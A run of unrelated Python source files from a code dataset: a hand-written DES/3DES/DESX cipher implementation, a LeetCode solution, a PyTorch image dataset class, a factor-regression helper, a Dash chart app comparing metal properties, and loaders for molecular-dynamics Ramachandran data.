bits\n if (len(b_key) > 64):\n b_key = b_key[:64]\n #permute key\n b_key = permutation(b_key, Table.PC1)\n #key length to 56\n b_key = b_key[:56]\n\n #print(b_key, len(b_key))\n subkey = subkey_generation(b_key)\n return subkey\n\n\ndef printList(list1: List[str]) -> None:\n \"\"\"\n print the list of binary data as string\n \"\"\"\n l = list1.copy()\n for i in range(len(l)):\n l[i] = str(l[i])\n print(''.join(l))\n\n\ndef strList(list1: List[str]) -> str:\n \"\"\"\n return string of binary date\n \"\"\"\n l = list1.copy()\n for i in range(len(l)):\n l[i] = str(l[i])\n return ''.join(l)\n\n\ndef binList(l: List[str]) -> int:\n \"\"\"\n convert l:List[str] to int for usage S_box \n \"\"\"\n for i in range(len(l)):\n l[i] = str(l[i])\n return int(''.join(l), 2)\n\n\ndef extend_right(right: list) -> list:\n \"\"\"\n return expanded right permutation(right, Table.E)\n \"\"\"\n for _ in range(16):\n right.append(0)\n return permutation(right, Table.E)\n\n\ndef s_box_replacement(right: List[str]) -> List[str]:\n r = []\n for x in range(8):\n r.append(right[x * 6:(x + 1) * 6])\n for x in range(len(r)):\n r[x] = Table.S_box[x][binList(r[x])]\n r[x] = intTObin(r[x])\n #printList(r[x])\n for x in r[1:]:\n for b in x:\n r[0].append(b)\n #print(r[0], len(r[0]))\n return r[0]\n\n\ndef strtobin_list(str1: list) -> List[int]:\n for i in range(len(str1)):\n str1[i] = int(str1[i])\n return str1\n\n\ndef fnc(right: list, subkey: list) -> List[int]:\n #print('func:')\n\n e_right = extend_right(right)\n #printList(right)\n #print('e_right')\n #printList(e_right)\n r = []\n for i in range(len(e_right)):\n e_right[i] = int(e_right[i])\n\n for i in range(len(subkey)):\n subkey[i] = int(subkey[i])\n\n for i in range(len(subkey)):\n r.append(e_right[i] ^ subkey[i])\n #print('xor with subkey')\n #printList(r)\n r = s_box_replacement(r)\n #print('s_box')\n #printList(r)\n r = permutation(r, Table.P)\n #print('permute')\n #printList(r)\n return r\n\n\ndef xor_list(L1: list, L2: list) -> list:\n l = []\n for i in range(len(L1)):\n l.append(L1[i] ^ L2[i])\n return l\n\n\ndef add_space(plaintext: str) -> str:\n \"\"\"\n add spaces to plaintext if len(plaintext)%8 > 0 \n \"\"\"\n if len(plaintext) % 8 > 0:\n for _ in range(8 - len(plaintext) % 8):\n plaintext = plaintext + ' '\n return plaintext\n\n\ndef converttext(plaintext):\n return plaintext\n\n\ndef DES_encrypt(plaintext, key, binary_input: bool = False):\n subkeys = key_generation(key)\n if not binary_input:\n plaintext = add_space(plaintext)\n plaintext = generate_bit(plaintext)\n else:\n plain_list = []\n for x in plaintext:\n plain_list.append(x)\n plaintext = plain_list\n blocks = []\n #create blocks\n for i in range(len(plaintext) // 64):\n blocks.append(plaintext[i * 64:(i + 1) * 64])\n #printList(blocks)\n encrypt_blocks = ''\n for block in blocks:\n #print('Start:')\n #printList(block)\n block = permutation(block, Table.IP)\n #print('IP:')\n #printList(block)\n for i in range(16):\n left = block[:32].copy()\n right = block[32:].copy()\n block[:32] = right\n block[32:] = xor_list(strtobin_list(left),\n strtobin_list(fnc(right, subkeys[i])))\n #print('round', i)\n #printList(block)\n block = permutation(block, Table.IP_inv)\n #print('IP_inv:')\n #print(strList(block), len(block))\n encrypt_blocks = encrypt_blocks + strList(block)\n return encrypt_blocks\n\n\ndef DES_decrypt(crypt, key, binary_output: bool = False):\n subkeys = key_generation(key)\n blocks = []\n for i in range(len(crypt) // 64):\n block = []\n for x in range(64):\n block.append(crypt[i * 64 + x])\n blocks.append(block)\n plaintext = ''\n #print(blocks, len(blocks))\n for block in blocks:\n #print('D_Start:')\n #printList(block)\n block = permutation(block, Table.IP)\n #print('D-IP:')\n #printList(block)\n for i in range(16):\n left = block[:32].copy()\n right = block[32:].copy()\n block[32:] = left\n block[:32] = xor_list(strtobin_list(right),\n strtobin_list(fnc(left, subkeys[15 - i])))\n #print('D_round', 15 - i)\n #printList(block)\n block = permutation(block, Table.IP_inv)\n #print('D_IP_inv:')\n #print(strList(block), len(block))\n #print(type(block[0]))\n if not binary_output:\n plaintext = plaintext + backToString(strList(block))[2:-1]\n else:\n plaintext = plaintext + strList(block)\n return plaintext\n\n\ndef backToString(s: str) -> str:\n \"\"\"\n convert block data back to string\n \"\"\"\n I_str = []\n for i in range(len(s) // 8):\n I_str.append(int(s[i * 8:(i + 1) * 8], 2))\n return str(bytes(I_str))\n\n\ndef DES3_encrypt(plaintext, key1, key2, key3):\n return DES_encrypt(DES_decrypt(DES_encrypt(plaintext, key1), key2, True),\n key3, True)\n\n\ndef DES3_decrypt(e_text, key1, key2, key3):\n return DES_decrypt(\n DES_encrypt(DES_decrypt(e_text, key3, True), key2, True), key1)\n\n\ndef DESX_xor(text, key, after_DESX_encrypt: bool = False):\n key = strtobin_list(generate_bit(key))[:64]\n if after_DESX_encrypt:\n b_text = []\n for x in text:\n b_text.append(int(x))\n else:\n b_text = strtobin_list(generate_bit(text))\n\n final_text = ''\n for i in range(len(b_text) // 64):\n x1 = xor_list(b_text[i * 64:(i + 1) * 64], key)\n for x in x1:\n final_text = final_text + str(x)\n return final_text\n\n\ndef DESX_encrypt(plaintext, key0, key1, key2):\n plaintext = add_space(plaintext)\n final_plaintext = DESX_xor(plaintext, key0)\n e_text = DES_encrypt(final_plaintext, key1, True)\n final_e_text = DESX_xor(e_text, key2, True)\n #print(final_e_text, len(final_e_text))\n return final_e_text\n\n\ndef DESX_decrypt(e_text, key0, key1, key2):\n f_e_text = DESX_xor(e_text, key2, True)\n plaintest = DES_decrypt(f_e_text, key1, True)\n f_plaintext = DESX_xor(plaintest, key0, True)\n print(backToString(f_plaintext)[2:-1])\n\n\nif __name__ == \"__main__\":\n #print('E_text', DES_encrypt('I\\'m Feeling Lucky!', '42234abc1'))\n #print(\n # DES_decrypt(DES_encrypt('I\\'m Feeling Lucky!', '42234abc1'),\n # '42234abc1'), )\n x = DESX_encrypt('Hello, World!', 11111111, 22222222, 33333333)\n DESX_decrypt(x, 11111111, 22222222, 33333333)\n #d1 = DES3_decrypt(e_text, 33333333, 22222222, 11111111)\n #print(e_text)\n #print(d1)\n #print(generate_bit('abc'), len(generate_bit('abc')))\n","sub_path":"DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":9128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"282543903","text":"def RemoveDuplicatesfromSortedArray(nums):\n if len(nums) == 0:\n return 0\n\n i = 0\n for index, num in enumerate(nums):\n if i == index:\n continue\n if num != nums[i]:\n i += 1\n nums[i] = num\n\n return i+1\n\n\nprint(RemoveDuplicatesfromSortedArray([1, 1, 2]))\n","sub_path":"leetcode/easy/RemoveDuplicatesfromSortedArray.py","file_name":"RemoveDuplicatesfromSortedArray.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"131713374","text":"import glob\nimport random\nimport os\n\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\nclass ImageDataset(Dataset):\n def __init__(self, root, transforms_=None, unaligned=False, mode='train'):\n self.transform = transforms.Compose(transforms_)\n self.unaligned = unaligned\n\n self.files_A = sorted(glob.glob(os.path.join(root, '%s/A' % mode) + '/*.*'))\n self.files_B = sorted(glob.glob(os.path.join(root, '%s/B' % mode) + '/*.*'))\n\n def __getitem__(self, index):\n A_correct = False\n B_correct = False\n\n A_name = self.files_A[index % len(self.files_A)]\n img_A = Image.open(A_name)\n try:\n item_A = self.transform(img_A)\n A_correct = True\n except:\n print(\"Wrong transform A: \", A_name)\n\n if self.unaligned:\n B_name = self.files_B[random.randint(0, len(self.files_B) - 1)]\n img_B = Image.open(B_name)\n try:\n item_B = self.transform(img_B)\n B_correct = True\n except:\n print(\"Wrong transform B: \", B_name)\n else:\n B_name = self.files_B[index % len(self.files_B)]\n img_B = Image.open(B_name)\n try:\n item_B = self.transform(img_B)\n B_correct = True\n except:\n print(\"Wrong transform B: \", B_name)\n\n if not A_correct or not B_correct: # if data encounter error\n return []\n\n return {'A': item_A, 'B': item_B}\n\n def __len__(self):\n return max(len(self.files_A), len(self.files_B))\n","sub_path":"implementations/cyclegan/datasets_box.py","file_name":"datasets_box.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372935127","text":"import collections\n\n\nclass Solution:\n def maxResult(self, a, k: int) -> int:\n n = len(a)\n dp = [0] * (n + 1)\n q = collections.deque()\n for i in range(1, n + 1):\n if not q:\n dp[i] = a[i - 1]\n else:\n dp[i] = a[i - 1] + dp[q[0]]\n while q and dp[q[-1]] <= dp[i]:\n q.pop()\n while q and i - q[0] >= k:\n q.popleft()\n q.append(i)\n return dp[n]\n\n\ns = Solution()\nprint(s.maxResult([1, -1, -2, 4, -7, 3], 2))\nprint(s.maxResult([10, -5, -2, 4, 0, 3], 3))\nprint(s.maxResult([1, -5, -20, 4, -1, 3, -6, -3], 2))\n","sub_path":"leetcode/2020/contest/weekly-220/Contest3.py","file_name":"Contest3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"266531774","text":"# \n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom lib.gftTools import gftIO\nfrom functools import reduce \nfrom datetime import datetime \n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import preprocessing\n\ndef GetRetData(context,Y,X):\n ##step1:get stock return date range,stock list\n df_y=Y\n df_x=X\n df_y=df_y.asMatrix()\n ls_y_date_range=list(df_y.index)\n \n ##step2:get factor loading,factorname,date range,stock list\n dict_x={df_x[i][0]:df_x[i][1].asMatrix() for i in range(len(df_x))} \n dict_datelength={i:len(j.index) for i,j in dict_x.items()}\n float_quantile=np.percentile(a=(list(dict_datelength.values())),q=5)\n dict_x={k: v for k, v in dict_x.items() if len(v.index) >= float_quantile}\n ls_allfactor_name=list(dict_x.keys())\n ls_x_date=[list(i.index) for i in dict_x.values()]\n ls_alldates_x=reduce(np.intersect1d,ls_x_date) \n \n ##step3:get date mapping for regression\n df_date_mapping=pd.DataFrame(data=ls_y_date_range,columns=['ret_date'])\n df_date_mapping['x_date']=df_date_mapping.shift(1)\n df_date_mapping_fnl = df_date_mapping[df_date_mapping.x_date.isin(list(ls_alldates_x))].copy()\n \n ##step4:get all symbols for regression,prepare all x/y data\n ls_y_dates= list(df_date_mapping_fnl.ret_date) \n dict_symbol={date: np.unique(df_y[df_y.index == date].T.dropna().index) for date in ls_y_dates}\n \n dict_x={date:x_merge(df_x,date,ls_allfactor_name,dict_symbol,df_date_mapping) for date in ls_y_dates}\n dict_y={date:df_y[df_y.index == date].T.reindex(index=dict_symbol[date]) for date in ls_y_dates}\n \n dict_expo_filter={k: missingpre(v) for k, v in dict_x.items()}###会导致每天的因子个数不\n dict_expo_std={k: (v -v.mean(axis=0))/v.std(axis=0) for k, v in dict_expo_filter.items()}\n dict_expo_std_new={k: v.apply(lambda x:x-min(x)/(max(x)-min(x))) for k, v in dict_expo_std.items()}\n return (dict_expo_std_new,dict_y)\n \ndef x_merge(df_x,date,ls_allfactor_name,dict_symbol,df_date_mapping):\n x_date=list(df_date_mapping[df_date_mapping.ret_date == date].x_date)[0]\n ls_raw_df_x=[df_x[i][1].asMatrix().reindex(index=[x_date],columns=dict_symbol[date]).rename(index={x_date:df_x[i][0]}) for i in range(len(ls_allfactor_name))] \n df_x_onedate=pd.concat(ls_raw_df_x,axis=0).T\n return df_x_onedate\ndef missingpre(v):\n df_expoonedate=v\n if len(df_expoonedate.columns) != len(np.unique(df_expoonedate.columns)):\n df_expoonedate=df_expoonedate.T.reset_index()\n df_expoonedate=df_expoonedate.drop_duplicates(subset='index').set_index(['index']).T\n dict_missingrate ={i:df_expoonedate[i].count()/df_expoonedate.shape[0] for i in list(df_expoonedate.columns)}\n dict_missingrate_filter={m: n for m,n in dict_missingrate.items() if n >= 0.8}\n ls_leftfactor=list(dict_missingrate_filter.keys())\n \n df_expoonedate_del=df_expoonedate.reindex(columns=ls_leftfactor)\n df_expoonedate_del=df_expoonedate_del.fillna(df_expoonedate_del.mean(axis=0,skipna=True))\n return df_expoonedate_del\n\n# \n\n\n\n# \n\n\n","sub_path":"owner/王秋君/GetRetData.py","file_name":"GetRetData.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"223918164","text":"from pygadgetreader import *\nimport numpy as np\n\nimport sys\nsys.path.insert(0, '/home/hungjinh/Research/baryon_proj/code')\nfrom cal_Pk_tool_MBII import *\n\n\n\ntemp_save_dir=\"/home/hungjinh/Research/baryon_proj/code/temp_storage/MBII_DMO_512/\"\n\nbasePath= '/physics/nkhandai/mb2dmo/'\n\nsnap=199\nNsubfiles=1024\nboxsize=100. # comoving Mpc/h\nresol = 512\nVbox=boxsize**3\n\n\nden=build_den_cube_DMO_MB2(snap,basePath,boxsize,resol,Nsubfiles)\n\nnp.save(temp_save_dir+\"den.npy\",den)\n","sub_path":"large_job/old_code/gen_den_cube_MBII_DMO.py","file_name":"gen_den_cube_MBII_DMO.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"539641917","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\n\n########### Define your variables\nbeers=['High carbon steel', 'Low carbon steel', ' Cast iron']\nbeers1=['Aluminium alloys', 'Stainless steel', ' Carbon fibre composite']\nbeers2 = ['Nickle alloy','Copper alloys']\nibu_values=[75,76,72,254,78,14,842,864]\nabv_values=[9.27,0,0,51,18.1,0,9,18.3]\ni_values = [260,247,217,97.1,251,63.3,282,146]\nj_values = [75.7,89.4,0,69.3,54,88.3,88.2,69.2]\nk_values = [46.4,31.7,17.9,45.2,86.4,0,38,34.7]\nl_values = [286,266,235,116,294,1030,296,231]\nm_values = [1120,716,310,344,941,1230,902,512]\nn_values = [896,519,124,278,669,1.55,585,384]\no_values = [14.30,20.20,6.67,9.94,26.50,94.60,33.80,22.60]\np_values = [200,202,118,77.4,196,0,207,119]\nq_values = [79.9,79.7,47.6,19.9,77.6,3.11,77.5,44.9]\nr_values = [160,160,0,0,166,0,0,140]\ns_values = [29.2,29,29.4,32.7,28.9,29.3,31.6,31.7]\nt_values = [2260,0,575,260,0,999,689,525]\nu_values = [2160,0,943,95.7,0,725,0,529]\nv_values = [53.05,61.30,48.80,55.90,31.70,0.00,0.00,32.60]\nw_values = [89,965,297,0,115,10.4,131,33.7]\nz_values = [34.1,54.9,0,7.91,115,0,151,47.8]\nmytitle='Elements : High carbon steel,Low carbon steel, Cast iron'\nmytitle1 = 'Elements : Aluminium alloys,Stainless steel,Carbon fibre composite'\nmytitle2 = 'Elements : Nickle alloy, Copper alloys'\ncolor1='lightblue'\ncolor2='darkgreen'\n\ntabtitle='Mech Project'\nmyheading='Elements Comparison'\nlabel1='IBU'\nlabel2='ABV'\n\n\n########### Set up the chart\nbitterness = go.Bar(\n x=beers,\n y=[ibu_values[0],ibu_values[1],ibu_values[2]],\n name='Density*10',\n marker={'color':color1}\n)\nalcohol = go.Bar(\n x=beers,\n y=[abv_values[0],abv_values[1],abv_values[2]],\n name='Particle Size',\n marker={'color':color2}\n)\ni = go.Bar(\n x = beers,\n y=[i_values[0],i_values[1],i_values[2]],\n name = 'Hardness (Brinell)',\n marker={'color':'red'}\n)\nj = go.Bar(\n x = beers,\n y = [j_values[0],j_values[1],j_values[2]],\n name = 'Hardness (Rockwell B)',\n marker={'color':'gold'}\n)\nk = go.Bar(\n x = beers,\n y = [k_values[0],k_values[1],k_values[2]],\n name = 'Hardness(Rockwell C)',\n marker = {'color':'indigo'}\n)\nl = go.Bar(\n x = beers,\n y = [l_values[0],l_values[1],l_values[2]],\n name = 'Vickers Hardness',\n marker = {'color':'blueviolet'}\n)\nm = go.Bar(\n x = beers,\n y = [m_values[0],m_values[1],m_values[2]],\n name = 'Tensile Strength(Ultimate)',\n marker = {'color':'dodgerblue'}\n)\nn = go.Bar(\n x = beers,\n y = [n_values[0],n_values[1],n_values[2]],\n name = 'Tensile strength(Yield)',\n marker = {'color':'deeppink'}\n)\no = go.Bar(\n x = beers,\n y = [o_values[0],o_values[1],o_values[2]],\n name = 'Elongation at break in %',\n marker = {'color' : 'maroon'}\n)\np = go.Bar(\n x = beers,\n y = [p_values[0],p_values[1],p_values[2]],\n name = 'Modulus of elastisity',\n marker = {'color' : 'teal'}\n)\nq = go.Bar(\n x = beers,\n y = [q_values[0],q_values[1],q_values[2]],\n name = 'Shear Modulus',\n marker = {'color' : 'dodgerblue'}\n)\nr = go.Bar(\n x = beers,\n y = [r_values[0],r_values[1],r_values[2]],\n name = 'Bulk Modulus',\n marker = {'color' : 'green'}\n)\ns = go.Bar(\n x = beers,\n y = [s_values[0],s_values[1],s_values[2]],\n name = 'Poissons Ratio*100',\n marker = {'color' : 'limegreen'}\n)\nt = go.Bar(\n x = beers,\n y = [t_values[0],t_values[1],t_values[2]],\n name = 'Flexture Yield strength',\n marker = {'color' : 'Chartreuse'}\n)\nu = go.Bar(\n x = beers,\n y = [u_values[0],u_values[1],u_values[2]],\n name = 'Compressive yield strength',\n marker = {'color' : 'tomato'}\n)\nv = go.Bar(\n x = beers,\n y = [v_values[0],v_values[1],v_values[2]],\n name = 'Machinability in %',\n marker = {'color' : 'lightcoral'}\n)\n\nw = go.Bar(\n x = beers,\n y = [w_values[0],w_values[1],w_values[2]],\n name = 'Izod Impact*10',\n marker = {'color' : 'darkorange'}\n)\nz = go.Bar(\n x = beers,\n y = [z_values[0],z_values[1],z_values[2]],\n name = 'Charpy Impact',\n marker = {'color' : 'sienna'}\n) \n\n\nbeer_data = [bitterness, alcohol,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,z]\nbeer_layout = go.Layout(\n barmode='group',\n title = mytitle\n)\n\nbeer_fig = go.Figure(data=beer_data, layout=beer_layout)\n#######################################################################\nbitterness1 = go.Bar(\n x=beers1,\n y=[ibu_values[3],ibu_values[4],ibu_values[5]],\n name='Density*10',\n marker={'color':color1}\n)\nalcohol1 = go.Bar(\n x=beers1,\n y=[abv_values[3],abv_values[4],abv_values[5]],\n name='Particle Size',\n marker={'color':color2}\n)\ni1 = go.Bar(\n x = beers1,\n y=[i_values[3],i_values[4],i_values[5]],\n name = 'Hardness (Brinell)',\n marker={'color':'red'}\n)\nj1 = go.Bar(\n x = beers1,\n y = [j_values[3],j_values[4],j_values[5]],\n name = 'Hardness (Rockwell B)',\n marker={'color':'gold'}\n)\nk1 = go.Bar(\n x = beers1,\n y = [k_values[3],k_values[4],k_values[5]],\n name = 'Hardness(Rockwell C)',\n marker = {'color':'indigo'}\n)\nl1 = go.Bar(\n x = beers1,\n y = [l_values[3],l_values[4],l_values[5]],\n name = 'Vickers Hardness',\n marker = {'color':'blueviolet'}\n)\nm1 = go.Bar(\n x = beers1,\n y = [m_values[3],m_values[4],m_values[5]],\n name = 'Tensile Strength(Ultimate)',\n marker = {'color':'dodgerblue'}\n)\nn1 = go.Bar(\n x = beers1,\n y = [n_values[3],n_values[4],n_values[5]],\n name = 'Tensile strength(Yield)',\n marker = {'color':'deeppink'}\n)\no1 = go.Bar(\n x = beers1,\n y = [o_values[3],o_values[4],o_values[5]],\n name = 'Elongation at break in %',\n marker = {'color' : 'maroon'}\n)\np1 = go.Bar(\n x = beers1,\n y = [p_values[3],p_values[4],p_values[5]],\n name = 'Modulus of elastisity',\n marker = {'color' : 'teal'}\n)\nq1 = go.Bar(\n x = beers1,\n y = [q_values[3],q_values[4],q_values[5]],\n name = 'Shear Modulus',\n marker = {'color' : 'dodgerblue'}\n)\nr1 = go.Bar(\n x = beers1,\n y = [r_values[3],r_values[4],r_values[5]],\n name = 'Bulk Modulus',\n marker = {'color' : 'green'}\n)\ns1 = go.Bar(\n x = beers1,\n y = [s_values[3],s_values[4],s_values[5]],\n name = 'Poissons Ratio*100',\n marker = {'color' : 'limegreen'}\n)\nt1 = go.Bar(\n x = beers1,\n y = [t_values[3],t_values[4],t_values[5]],\n name = 'Flexture Yield strength',\n marker = {'color' : 'Chartreuse'}\n)\nu1 = go.Bar(\n x = beers1,\n y = [u_values[3],u_values[4],u_values[5]],\n name = 'Compressive yield strength',\n marker = {'color' : 'tomato'}\n)\nv1 = go.Bar(\n x = beers1,\n y = [v_values[3],v_values[4],v_values[5]],\n name = 'Machinability in %',\n marker = {'color' : 'lightcoral'}\n)\n\nw1 = go.Bar(\n x = beers1,\n y = [w_values[3],w_values[4],w_values[5]],\n name = 'Izod Impact*10',\n marker = {'color' : 'darkorange'}\n)\nz1 = go.Bar(\n x = beers1,\n y = [z_values[3],z_values[4],z_values[5]],\n name = 'Charpy Impact',\n marker = {'color' : 'sienna'}\n) \n\n\nbeer_data1 = [bitterness1, alcohol1,i1,j1,k1,l1,m1,n1,o1,p1,q1,r1,s1,t1,u1,v1,w1,z1]\nbeer_layout1 = go.Layout(\n barmode='group',\n title = mytitle1\n)\n\nbeer_fig1 = go.Figure(data=beer_data1, layout=beer_layout1)\n###########################################################################################\nbitterness2 = go.Bar(\n x=beers2,\n y=[ibu_values[6],ibu_values[7]],\n name='Density*10',\n marker={'color':color1}\n)\nalcohol2 = go.Bar(\n x=beers2,\n y=[abv_values[6],abv_values[7]],\n name='Particle Size',\n marker={'color':color2}\n)\ni2 = go.Bar(\n x = beers2,\n y=[i_values[6],i_values[7]],\n name = 'Hardness (Brinell)',\n marker={'color':'red'}\n)\nj2 = go.Bar(\n x = beers2,\n y = [j_values[6],j_values[7]],\n name = 'Hardness (Rockwell B)',\n marker={'color':'gold'}\n)\nk2 = go.Bar(\n x = beers2,\n y = [k_values[6],k_values[7]],\n name = 'Hardness(Rockwell C)',\n marker = {'color':'indigo'}\n)\nl2 = go.Bar(\n x = beers2,\n y = [l_values[6],l_values[7]],\n name = 'Vickers Hardness',\n marker = {'color':'blueviolet'}\n)\nm2 = go.Bar(\n x = beers2,\n y = [m_values[6],m_values[7]],\n name = 'Tensile Strength(Ultimate)',\n marker = {'color':'dodgerblue'}\n)\nn2 = go.Bar(\n x = beers2,\n y = [n_values[6],n_values[7]],\n name = 'Tensile strength(Yield)',\n marker = {'color':'deeppink'}\n)\no2 = go.Bar(\n x = beers2,\n y = [o_values[6],o_values[7]],\n name = 'Elongation at break in %',\n marker = {'color' : 'maroon'}\n)\np2 = go.Bar(\n x = beers2,\n y = [p_values[6],p_values[7]],\n name = 'Modulus of elastisity',\n marker = {'color' : 'teal'}\n)\nq2 = go.Bar(\n x = beers2,\n y = [q_values[6],q_values[7]],\n name = 'Shear Modulus',\n marker = {'color' : 'dodgerblue'}\n)\nr2 = go.Bar(\n x = beers2,\n y = [r_values[6],r_values[7]],\n name = 'Bulk Modulus',\n marker = {'color' : 'green'}\n)\ns2 = go.Bar(\n x = beers2,\n y = [s_values[6],s_values[7]],\n name = 'Poissons Ratio*100',\n marker = {'color' : 'limegreen'}\n)\nt2 = go.Bar(\n x = beers2,\n y = [t_values[6],t_values[7]],\n name = 'Flexture Yield strength',\n marker = {'color' : 'Chartreuse'}\n)\nu2 = go.Bar(\n x = beers2,\n y = [u_values[6],u_values[7]],\n name = 'Compressive yield strength',\n marker = {'color' : 'tomato'}\n)\nv2 = go.Bar(\n x = beers2,\n y = [v_values[6],v_values[7]],\n name = 'Machinability in %',\n marker = {'color' : 'lightcoral'}\n)\n\nw2 = go.Bar(\n x = beers2,\n y = [w_values[6],w_values[7]],\n name = 'Izod Impact*10',\n marker = {'color' : 'darkorange'}\n)\nz2 = go.Bar(\n x = beers2,\n y = [z_values[6],z_values[7]],\n name = 'Charpy Impact',\n marker = {'color' : 'sienna'}\n)\n\nbeer_data2 = [bitterness2, alcohol2,i2,j2,k2,l2,m2,n2,o2,p2,q2,r2,s2,t2,u2,v2,w2,z2]\nbeer_layout2 = go.Layout(\n barmode='group',\n title = mytitle2\n)\n\nbeer_fig2 = go.Figure(data=beer_data2, layout=beer_layout2)\n\n\n########### Initiate the app\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.title=tabtitle\n\n########### Set up the layout\napp.layout = html.Div(children=[\n html.H1(myheading),\n dcc.Graph(\n id='flyingdog',\n figure=beer_fig\n ),\n dcc.Graph(\n id = 'f2',\n figure=beer_fig1\n ),\n dcc.Graph(\n id = 'f3',\n figure = beer_fig2\n )\n \n ]\n)\n\nif __name__ == '__main__':\n app.run_server()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"44344467","text":"#\n# This module contains I/O helper classes for this project.\n#\nfrom __future__ import absolute_import, division\nfrom __future__ import print_function, unicode_literals\nimport numpy as np\n\n\ndef load_training_density(filedir):\n \"\"\"\n # Load the MD density data of the classification.\n #\n # Input\n # =====\n # `filedir`: (str) The directory containing the data.\n #\n # Return\n # =====\n # `densities`: (list) A list of 2-D arrays of the densities.\n # `labels`: (list) A list of arrays of the labels arranged as\n # (is_begnin, is_pathogenic).\n \"\"\"\n import os\n import glob\n d_shape = (32, 32, 1) # Density shape\n bp = os.path.join(filedir, 'Benign/density')\n pp = os.path.join(filedir, 'Pathogenic/density')\n bs = glob.glob(bp + '/*_density.csv')\n ps = glob.glob(pp + '/*_density.csv')\n\n # Load\n densities = []\n labels = []\n for b in bs:\n bb = np.loadtxt(b, delimiter=',', skiprows=1)[:, 1] # Get 2nd col.\n densities.append(np.reshape(bb, d_shape))\n labels.append([[[1, 0]]])\n for p in ps:\n pp = np.loadtxt(p, delimiter=',', skiprows=1)[:, 1] # Get 2nd col.\n densities.append(np.reshape(pp, d_shape))\n labels.append([[[0, 1]]])\n return np.asarray(densities), np.asarray(labels)\n\n\ndef load_training_rama(filedir, postfix='', extra=False):\n \"\"\"\n # Load the MD rama data of the classification.\n #\n # Input\n # =====\n # `filedir`: (str) The directory containing the data.\n #\n # Return\n # =====\n # `densities`: (list) A list of 2-D arrays of the densities.\n # `labels`: (list) A list of arrays of the labels arranged as\n # (is_begnin, is_pathogenic).\n # `mutants`: (list) A list of mutants.\n \"\"\"\n import os\n import glob\n import re\n # rama shape: (time_frame, protein_size, phi_psi)\n if 'TP53' in filedir:\n d_shape = (334, 217, 2)\n elif 'MLH1' in filedir:\n d_shape = (334, 346, 2)\n skip = ['M1I', 'M1K', 'M1R', 'M1T', 'M1V']\n bp = os.path.join(filedir, 'Benign/rama_csv' + postfix)\n pp = os.path.join(filedir, 'Pathogenic/rama_csv' + postfix)\n bs = glob.glob(bp + '/*_rama.csv')\n ps = glob.glob(pp + '/*_rama.csv')\n\n # Load\n densities = []\n labels = []\n mutants = []\n for b in bs:\n bb = np.loadtxt(b, delimiter=',', usecols=[0, 1]) # skip last col.\n densities.append(np.reshape(bb, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n labels.append([[[1, 0]]])\n mutants.append(re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, b)[0])\n for p in ps:\n m = re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, p)[0]\n if m in skip:\n print('Skipping', m)\n continue\n pp = np.loadtxt(p, delimiter=',', usecols=[0, 1]) # skip last col.\n densities.append(np.reshape(pp, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n labels.append([[[0, 1]]])\n mutants.append(re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, p)[0])\n if extra:\n wp = os.path.join(filedir, 'Benign')\n ws = glob.glob(wp + '/wildtype*_rama.csv')\n for b in ws:\n if 'None' in b:\n print('Skipping', b)\n continue\n bb = np.loadtxt(b, delimiter=',', usecols=[0, 1]) # skip last col.\n densities.append(np.reshape(bb, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n labels.append([[[1, 0]]])\n mutants.append(re.findall('Benign\\/(.*)\\_.*\\_.*ns\\_rama\\.csv', b)[0])\n return np.asarray(densities), np.asarray(labels), mutants\n\n\ndef load_vus_rama(filedir, postfix=''):\n \"\"\"\n # Load the MD rama data of the classification.\n #\n # Input\n # =====\n # `filedir`: (str) The directory containing the data.\n #\n # Return\n # =====\n # `densities`: (list) A list of 2-D arrays of the densities.\n # `mutants`: (list) A list of mutants.\n \"\"\"\n import os\n import glob\n import re\n # rama shape: (time_frame, protein_size, phi_psi)\n if 'TP53' in filedir:\n d_shape = (334, 217, 2)\n elif 'MLH1' in filedir:\n d_shape = (334, 346, 2)\n bp = os.path.join(filedir, 'VUS/rama_csv' + postfix)\n bs = glob.glob(bp + '/*_rama.csv')\n if 'TP53' in filedir:\n skip = ['C242G', 'V216G'] # ['K101Q']\n elif 'MLH1' in filedir:\n skip = [] # ['G181D', 'V326M', 'I50F', 'G98D', 'V16G']\n\n # Load\n densities = []\n mutants = []\n for b in bs:\n m = re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, b)[0]\n if m in skip:\n print('Skipping', m)\n continue\n bb = np.loadtxt(b, delimiter=',', usecols=[0, 1]) # skip last col.\n try:\n densities.append(np.reshape(bb, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n mutants.append(m)\n except ValueError:\n print('Cannot load', m)\n return np.asarray(densities), 